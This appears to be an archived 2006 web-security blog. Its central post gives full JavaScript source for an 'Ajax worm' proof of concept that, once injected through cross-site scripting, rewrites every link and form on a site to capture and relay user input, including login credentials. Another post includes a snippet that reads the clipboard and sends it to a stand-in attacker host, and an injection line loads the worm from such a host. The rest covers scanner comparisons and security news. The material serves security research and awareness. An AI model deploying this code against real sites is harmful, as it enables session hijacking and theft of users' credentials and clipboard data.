Tuesday, December 12, 2006

Did you SEEC it yet?

I am pleased to announce SEEC - an application security search engine. The search engine is powered by Google and is specific to application security. It is still in beta. You can access it here - SEEC

Why SEEC?
Well, SEC is short for security and SEEK means to find; hence SEEC (find within security).
Please do leave your comments and feedback on SEEC.


Also, a few weeks ago I released AttackLabs - a website to display proof of concepts of various web application attacks. It has two PoCs to begin with, and I am currently working with Jeremiah to display all his PoCs on the site. If you wish to display your proof of concepts on the site, please feel free to submit your attack at www.attacklabs.com, or you can email me at anurag.agarwal@yahoo.com

Wednesday, December 06, 2006

Survey on Application Security Vulnerability Assessment process

Today Jeremiah posted the third round of his monthly survey of web application security professionals.
http://jeremiahgrossman.blogspot.com/2006/12/web-application-security-professionals.html

The results of the first two are available here

[1] Nov. 2006
http://jeremiahgrossman.blogspot.com/2006/11/web-application-security-professionals.html

[2] Oct. 2006
http://jeremiahgrossman.blogspot.com/2006/10/web-application-security-professionals.html

This survey will help us assess the current state of vulnerability assessment in our software development life cycles, depending, of course, on the participation. I would encourage everyone in the application security field to take this survey. The more the participation, the better the picture we get out of it. If we have enough data, then maybe we can see a deviation report as well.

Sunday, December 03, 2006

Ajax Worm - Proof of Concept

A few weeks ago I demonstrated a proof of concept of how easy it is to create an Ajax worm which hijacks a user's session and redirects all the user's activity through itself. The idea is simply to control and monitor the user's activity on a website by inserting a malicious script into the visiting user's session using XSS. I have been advocating for some time now the extent of damage that can be done using Ajax's XMLHttpRequest (XHR) object. All an attacker needs is a website vulnerable to an XSS attack; they can then inject a small JavaScript file which takes control of the user for as long as he is on that site, and in some cases even after he has left the website. This proof of concept is limited to the worm propagating on a single site, as Ajax cannot make cross-domain requests just yet (though that is under consideration). If you want cross-domain requests, you may want to consider the FlashXMLHttpRequest object.

Asynchronous JavaScript and XML, better known as Ajax, is a relatively new technology that is already gaining a lot of momentum in the industry. Ajax by itself may not open any new vulnerabilities, but it does increase the attack surface, and in combination with vulnerabilities like cross site scripting it can be devastating, because it lends the attack stealth. In traditional web browsing, when a user clicks on a link or submits a form, the request goes to the server, the server sends back a response, a new page is loaded on the screen, and a new url appears in the location bar (unless it's a dynamic page submitting to itself). In either case, the user sees the browser screen refresh and a new page load, because the request and response were handled by the browser.

With Ajax, the same request and response can be handled by the application itself. Now when a user clicks on a link or submits a form, the XHR object can do everything behind the scenes, and the page doesn't have to refresh the way it does in traditional browsing. The url in the location bar stays the same even though we may be loading a different url altogether. Ajax has helped applications immensely in providing a better user experience and a richer user interface, but at the same time it has opened a world of opportunities for the bad guys. An attacker can now do far more damage than usual by exploiting vulnerabilities in your application. For example, if someone can exploit a cross site scripting vulnerability in your application, with the help of Ajax they can virtually control your application.
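As a minimal illustration of that difference (the url below is just a placeholder), the following snippet fetches another page in the background and swaps it into the current document; the browser never navigates and the location bar never changes.

// Fetch a page with XHR and replace the current content in place.
var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                : new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET", "/some/other/page.html", false);  // synchronous, for brevity
xhr.send(null);
if (xhr.status == 200) {
    // The page content changes, but the url in the location bar does not.
    document.body.innerHTML = xhr.responseText;
}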

In this paper, I will explain how easy it is to hijack a website with the help of Ajax by inserting a script which propagates to every page you visit on that website.


When the script is injected into a vulnerable site, the create_object, collect_links and collect_forms methods from the worm.js script are called, as sketched below.
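For illustration, here is a minimal sketch of that entry point. The vulnerable site, page and parameter, and the attacker's host, are hypothetical; only the three function calls come from the actual worm.js.

// Hypothetical XSS injection point (site, page and parameter are made up):
// http://vulnerable.example/search?q=<script src="http://attacker.example/worm.js"></script>

// worm.js bootstrap - runs as soon as the injected script loads.
var ajax_request = null;  // shared XHR object used by all the functions below

create_object();   // build a cross-browser XHR object
collect_links();   // hijack every link on the current page
collect_forms();   // hijack every form on the current page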

//Create an ajax object
create_object creates a cross-browser connection to the server using Ajax. For IE 5 and 6 we use an ActiveXObject, while for IE 7 and Firefox we use the native XMLHttpRequest. All of the worm's Ajax communication is done through this object. The XMLHttpRequest object is an interface exposed by a scripting engine that allows scripts to perform HTTP client functionality, such as submitting form data or loading data from a server. The object keeps the name XMLHttpRequest for compatibility with the existing web, even though the name doesn't make much sense otherwise: it supports the transport of data formats other than XML, some implementations support protocols other than HTTP, and the API supports sending data as well as receiving it.

function create_object() {
    // This is a stripped-down version of what I am using in the actual
    // script, to demonstrate how to create an XHR object.
    // (ajax_request is a global variable shared by the rest of the worm.)

    // IE 5 and 6 expose XHR through ActiveX.
    if (window.ActiveXObject) {
        ajax_request = new ActiveXObject("MSXML2.XMLHTTP");
    }

    // IE 7 and Firefox expose a native XMLHttpRequest object.
    if (!ajax_request && typeof XMLHttpRequest != 'undefined') {
        ajax_request = new XMLHttpRequest();
    }
}

//Code to capture all the links
This is where we capture all the links on a page. If a link is an internal link, we replace it with our JavaScript function. Now, whenever the user clicks on any of the links, the browser, instead of opening that page, calls the JavaScript function, which silently communicates with the server in the background, fetches the link and loads the page into the document; while doing so, it captures all the links and forms of the newly loaded page.

function collect_links()
{
    // Collect all the links in the html page.
    var all_links = document.getElementsByTagName("a");

    // Go through all the links one by one.
    for (var i = 0; i < all_links.length; i++) {

        // Replace each link with the javascript function.
        all_links[i].href = "javascript:loadUrl('" + all_links[i].href + "');";
    }
}


//Code to capture all the forms.
This is where we capture all the forms in a web page. The collect_forms function does the same thing as collect_links, except that it looks for all the forms and replaces their action attribute with its JavaScript function. It also inserts, or replaces if one already exists, the id of each form with the original action url, so that the worm script can identify the form at the time of submission. As you will see in the last line below, the action attribute is replaced by the worm's submit_form function. So when the user tries to submit any form, instead of the browser submitting the form to the server, the submit_form function will be called.

function collect_forms()
{
    // Collect all the forms in the html page.
    var all_forms = document.getElementsByTagName("form");

    // Go through all the forms one by one.
    for (var i = 0; i < all_forms.length; i++) {
        // Replace the id of the form with the original submit url.
        all_forms[i].id = all_forms[i].action;

        // Replace the submit url of the form with the javascript function.
        all_forms[i].action = "javascript:submit_form('" + all_forms[i].action + "');";
    }
}


//Code to load the requested url dynamically
The loadUrl function takes a url as a parameter, connects to the server and requests that url. The server treats this like any other request it would have received from the client and sends back the file at that url. Normally it is the browser that receives the file and displays it, but with Ajax it is our XHR object which receives the file and updates the client screen with the new HTML code; it then calls the collect_links and collect_forms functions to hijack the links and forms in the newly loaded HTML. This way, the worm script stays in control of every request and response between the client browser and the server.

function loadUrl(url)
{
    // Connect to the server and request that url.
    ajax_request.open("GET", url, false);
    ajax_request.send(null);

    // Check the request status. Status 200 means the request was successful.
    if (ajax_request.status == 200) {
        // Load the response from the server into the document's body. This
        // dynamically changes the content of the page, but the url in the
        // address bar of the browser remains the same. So even though a new
        // url is loaded, the location bar still shows the original page's url.
        var response_text = ajax_request.responseText;
        document.body.innerHTML = response_text;

        // Hijack all the links and forms in the new html page.
        collect_links();
        collect_forms();
    }
}


//Code to create the form parameter string
This function is called when a user tries to submit a form. Since every form has been hijacked and its action replaced with the worm's submit_form function, when the user clicks the submit button this function is called with the id of the form, which was set to the original action url at the time of hijacking. Based on that id, the script looks up the form and its elements. It then calls the post_attacker function, which submits the values to the server, captures the response, displays it in the user's window and hijacks any links or forms in the new HTML code. For the sake of this demo, when you enter a username and password on the login page and click submit, the script displays the values on the screen before calling post_attacker.
function submit_form(form_id)
{
    // Get the form element from the id.
    var form = document.getElementById(form_id);

    // This is where the form values are displayed when the user presses the submit button.
    var form_submit = document.getElementById('form_element');
    form_submit.innerHTML = "These values will be submitted to " + form_id + "<br>";

    // All the parameters have to be in the format name=value to be submitted to the server.
    var post_url = "";

    // Iterate through every element of the form.
    for (var i = 0; i < form.length; i++) {
        var line = form.elements[i].name + "=" + form.elements[i].value;
        form_submit.innerHTML += line + "<br>";
        post_url += line;

        // Multiple name=value pairs have to be separated with &.
        if (i + 1 < form.length)
            post_url += "&";
    }

    // Post it to the server.
    post_attacker(form_id, post_url);
}

//Code to submit the form dynamically
function post_attacker(url, parameters) {

    // Create a POST connection to the url.
    ajax_request.open("POST", url, false);

    // Set the header values.
    ajax_request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");

    // Send the parameters.
    ajax_request.send(parameters);

    // Load the response from the server into the document's body.
    if (ajax_request.readyState == 4 && ajax_request.status == 200) {
        var response_text = ajax_request.responseText;
        document.body.innerHTML = response_text;

        // Hijack all the links and the forms.
        collect_links();
        collect_forms();
    }
}


As you can see, it is easy to create a worm with the help of Ajax that controls all the communication between the user and the server. Whether the user clicks a link or submits a form, everything passes through the worm script. The worm also has the capability to change the data before it is submitted to the server, or before it is loaded into the user's browser after it is received from the server, as in the sketch below.
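As a sketch of that last capability (the parameter name "amount" is purely hypothetical, not part of the PoC), submit_form could pass the captured data through a tampering hook before posting it:

// Sketch: rewrite captured form data before it is posted.
// 'post_url' is the name=value string built inside submit_form;
// the 'amount' parameter here is made up for illustration.
function tamper(post_url) {
    return post_url.replace(/amount=\d+/, "amount=999999");
}

// Inside submit_form, the last line would then become:
// post_attacker(form_id, tamper(post_url));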

This is just a proof of concept to reiterate how deadly a combination of cross site scripting and Ajax can be. Currently it is limited to a single site, as we cannot make cross-domain Ajax requests just yet. With cross-domain Ajax requests, the implications could be far more dangerous. I am not against having cross-domain requests in Ajax, but if and when they are allowed, the security implications should be considered as well, and if possible, solutions or scenarios should be suggested that a developer can consider while using cross-domain Ajax requests.


To see a demo of the proof of concept, please go to http://www.attacklabs.com
To download the source code, go to http://www.attacklabs.com/download/ajax_worm.zip

Monday, November 20, 2006

Correction - Comparison between Appscan and Webinspect

In my last post, I discussed some of the differences between Appscan and Webinspect. Ory Segal from Watchfire pointed out a few areas which could have been interpreted wrongly. I have made changes to the original post, and I am posting them separately here for those who have already read it, or in case the old version is stored in a cache somewhere.


  • View the actual attack during a scan session: Webinspect displays the actual attack string on the status bar during the scan, as well as whether a vulnerability was found, whereas in Appscan you can only see whether a vulnerability was found.


  • Vulnerabilities: Appscan found more vulnerabilities, with more variants, in a scan as compared to Webinspect. One other difference between the two products in terms of vulnerabilities is that if there are 200 pages with the same vulnerability, Appscan will display it as one vulnerability but lets you drill down to all 200 pages, whereas Webinspect will simply display it as one. Having said that, Appscan still detects more types of vulnerabilities than Webinspect.


  • What if the webapp stops responding during a scan: If your webapp stops responding during the scan, Webinspect displays an error and pauses the scan, so you can fix the problem and resume the scan later. Appscan does the same, but since its pause button is in a dropdown rather than on the toolbar, it can be a little confusing.



For comments and feedback, please email me at anurag.agarwal@yahoo.com

Friday, November 03, 2006

Comparison between Appscan and Webinspect

Last month I got a chance to evaluate two popular vulnerability assessment tools, Webinspect and Appscan, and I wanted to share my findings with others. As you will notice, I have currently published only a few technical comparisons; I will add more soon. This comparison is strictly between Appscan 6.5 and Webinspect 6.2. Both companies have since come out with beta releases of new versions of their products, and this comparison may not be valid for those new versions.
The evaluation was done on a dynamic web application with approx. 1800 web pages.

  • Scan duration: On a website of approx. 1800 pages, Appscan took around 6 hours, whereas Webinspect took more than 12 hours (I had to stop it there, as it would have taken a lot more time). I then removed post-data injection from the list of attacks, and the entire scan completed in approx. 4 hours.

  • Ability to pause a scan: Both tools give you the ability to pause a scan and restart it later.

  • Save a partial scan and restart later: Both tools allow you to save a partial scan and restart it later.

  • What if the webapp stops responding during a scan: If your webapp stops responding during the scan, Webinspect displays an error and pauses the scan, so you can fix the problem and resume the scan later. Appscan does the same, but since its pause button is in a dropdown rather than on the toolbar, it can be a little confusing.

  • Change the network in the middle of a scan session: While a scan is in progress, if you want to pause it and resume from home over a VPN connection, Appscan lets you resume the scan without any problems, whereas Webinspect gave me an error. Since I only tried this once, I am not sure whether it is a real problem with Webinspect; check it yourself if you're going to need this feature.

  • Maximum threads that can run simultaneously: Appscan has a maximum of 10 threads, whereas Webinspect has 75. You can customize the number of threads you want to run simultaneously; however, if you use more than 15 threads in Webinspect, it becomes very resource intensive.

  • Pick and choose attacks for a scan session: Both Appscan and Webinspect let you do that.

  • Skip an attack while the scan is in progress: Webinspect lets you skip an attack while the scan is in progress, whereas Appscan doesn't.

  • View the actual attack during a scan session: Webinspect displays the actual attack string on the status bar during the scan, as well as whether a vulnerability was found, whereas in Appscan you can only see whether a vulnerability was found.

  • Customize the order of attacks for a scan session: Neither product lets you customize the order of the scan. So if you want to run cross site scripting and SQL injection first, you will have to create a new scan session, opt for just those two attacks and remove all the others from the list.

  • Custom attack scripts: Both Appscan and Webinspect let you create a custom attack script as a macro. Webinspect, however, also lets you create a custom attack agent using VBScript.

  • Vulnerability database updates: Both products update their vulnerability databases regularly.

  • Vulnerabilities: Appscan found more vulnerabilities, with more variants, in a scan as compared to Webinspect. One other difference between the two products in terms of vulnerabilities is that if there are 200 pages with the same vulnerability, Appscan will display it as one vulnerability but lets you drill down to all 200 pages, whereas Webinspect will simply display it as one. Having said that, Appscan still detects more types of vulnerabilities than Webinspect.

  • Login module at the start of a scan: Appscan lets you record a login sequence as a macro, whereas Webinspect gives you more options: it lets you record a login sequence as a macro or enter the authentication credentials in the tool itself. The problem with entering the credentials inside the tool, however, is that if they are wrong, Webinspect does not detect them as wrong and goes ahead with the scan, and hence may not scan the entire site. If you instead use a macro to record the login sequence, Webinspect records the complete login and logout sequence, whereas Appscan only records the login sequence.

  • Bookmark or follow-up flag on a specific attack during a scan session: Neither tool currently has this feature.

  • External tools: Both products have additional tools bundled with them. Watchfire's power tools are not integrated with Appscan and can be downloaded and used separately; Appscan, however, provides a framework through which external tools can be invoked from within Appscan. Webinspect, on the other hand, has more tools, and all of them are tightly integrated within the product, but Webinspect does not allow you to invoke an external tool from within the application.

  • Infrastructure vulnerabilities: Appscan scans for certain infrastructure vulnerabilities (like Apache, IIS, etc.) whereas Webinspect does not.


This is by no means a complete report. I will add more points to it soon, so please check back again. Also, if there is something additional you would like to see in this report, or if you would like to add to it or change it, please email me at anurag.agarwal "at" yahoo.com. I also got a chance to look at the beta releases of Appscan 7.0 and the Webinspect Phoenix release, and if you are looking to purchase one of these two products, I would strongly recommend looking at the beta releases of the new versions.

Thursday, October 26, 2006

Don't let your Web app help spammers

We've all been plagued by unsolicited commercial email -- also known as spam. In fact, the Washington Post reported that spam may soon account for half of all U.S. email traffic.
Let's look at some ways we can protect our email addresses from spammers.
read the complete article here
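One common defense from that era (not necessarily one covered in the article) is to assemble the address at runtime with JavaScript, so that harvester bots scanning the raw HTML never see it. The address below is a placeholder.

// The address never appears verbatim in the page source that
// harvesters scan; it only exists once the script runs.
var user = "someone";        // placeholder mailbox
var host = "example.com";    // placeholder domain
document.write('<a href="mailto:' + user + '@' + host + '">' +
               user + '@' + host + '</a>');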

Wednesday, October 11, 2006

How Ajax makes it easier to steal information from your clipboard

Cut, copy and paste have always been an important part of our digital life. Developers, as well as regular users, can't live without them. Regular users routinely copy and paste information such as passwords and credit card numbers from one form to another, and office employees use the clipboard all the time when creating documents. There's no denying our reliance on the copy and paste functionality of the clipboard.

How would you feel if that information were stolen out of your computer?

read the complete article here
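For context, here is a minimal sketch of the kind of trick the article discusses, using the clipboardData object that IE 6 exposed to script by default; the exfiltration URL is made up.

// Works in IE 6 with default security settings: read the clipboard
// and silently ship it off inside an image request.
if (window.clipboardData) {
    var stolen = window.clipboardData.getData("Text");
    if (stolen) {
        new Image().src = "http://attacker.example/steal?data=" +
                          encodeURIComponent(stolen);
    }
}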

Sunday, October 08, 2006

Taking the battle to the phishers

"University of Illinois at Chicago is working with some financial institutions (he can't say which) on the anti-phishing agent, so there is commercial interest. "We'll be providing them complex code, user names, and passwords," he says. "And they will be able to see the phishing traffic" and disable it and track the phishers for eventual prosecution, for instance. "

This would be really interesting. So far we have seen a few approaches, including building a database of known phishing sites; that is a slow, evolving process, though, and not good enough to stop phishing attacks. This anti-phishing agent may just be the answer for a quick response to phishing attacks.

read the complete article here

Friday, October 06, 2006

Court OKs NSA wiretapping

http://www.wired.com/news/wireservice/0,71911-0.html?tw=wn_technology_security_3

"The Bush administration can continue its warrantless surveillance program while it appeals a judge's ruling that the program is unconstitutional, a federal appeals court ruled Wednesday."

"The program monitors international phone calls and e-mails to or from the United States involving people the government suspects have terrorist links. A secret court has been set up to grant warrants for such surveillance, but the government says it can't always wait for a court to take action."


Are they monitoring only what they have mentioned here?

Is Microsoft changing?

http://wired.com/wired/archive/14.10/microsoft.html

Something a little different from security, but if every chief security architect could be like Ray Ozzie, 75% of the security attacks we are seeing today wouldn't be possible at all.

How safe is “hacker safe”

ID Thieves Turn Sights on Smaller E-Businesses

This article raises so many questions, but the biggest of them all is how effective the sites providing these kinds of "hacker safe" services really are, and who is to verify what level of service they are providing. For all we know, it's just a false sense of security, as we found out in this case. Companies that are totally unaware of what to do about information security get sucked into these kinds of services and are left at the mercy of hackers.

Google victim of click fraud

This time it was Google's turn to play victim to click fraud.

http://www.theregister.co.uk/2006/10/06/google_adsense_worm/

RE: Privacy group takes US to court over email spying

post: http://www.theregister.co.uk/2006/10/06/eff_sues_us_govt/

What I would like to know is whether the US govt. can state, for the record, that they are only using it to monitor terrorist communications and NOTHING ELSE. They have claimed that they are using it to track terrorist communications, but I don't know if they have ever said only terrorist communications and nothing else.

Wednesday, October 04, 2006

To open source or not to open source

Yahoo allows outsiders to innovate on Yahoo e-mail

Yahoo has decided to open the underlying code of Yahoo mail to outside programmers. This can be both a good thing and a bad thing. Of course we will see a lot more applications built on top of Yahoo mail, but it is also a nightmare from a security point of view. On one hand, since the source code is openly accessible, Yahoo mail becomes more vulnerable to attacks; on the other, how secure will the newer applications that get integrated with Yahoo mail be?

Tuesday, October 03, 2006

Taking passwords to the grave

An interesting story on passwords.

http://news.com.com/Taking+passwords+to+the+grave/2100-1025_3-6118314.html

It brings up an interesting twist to the whole password saga by raising the question of whether we should store our passwords in our wills. There may be valid reasons to do so, but isn't that against what we preach?